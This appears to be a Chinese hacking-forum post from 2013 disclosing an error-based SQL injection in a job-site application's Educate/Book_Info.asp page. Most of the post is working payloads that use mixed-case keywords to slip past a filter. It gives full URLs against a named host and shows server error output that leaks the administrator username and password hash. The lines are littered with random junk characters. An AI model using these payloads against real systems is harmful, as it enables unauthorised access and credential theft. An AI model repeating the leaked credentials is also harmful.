漏洞出现在Educate/Book_Info.asp
# r& f) ^! A& \. @- M1 A0 A此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
: ~' i" X* d& r2 Lexp:如下
4 ^. I9 ?- o! b2 Y- k1 r0 [查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# q( v& D7 d, m
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 x5 \5 o& s- [* n( m! G( uhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& Q0 c+ c$ h# q4 JMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'' O4 }9 @+ D7 l8 l
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。& C5 ~8 t( B8 d. W. p9 h
/Educate/Book_Info.asp,行 8
3 Y7 R* M, \; _$ w m/ [http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* i" l, \, C! y* k5 z+ c7 p t
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'! ]8 Q# ^4 ?9 W$ ?: y) R
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
: X6 U* a! r B- n9 i. W3 W/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对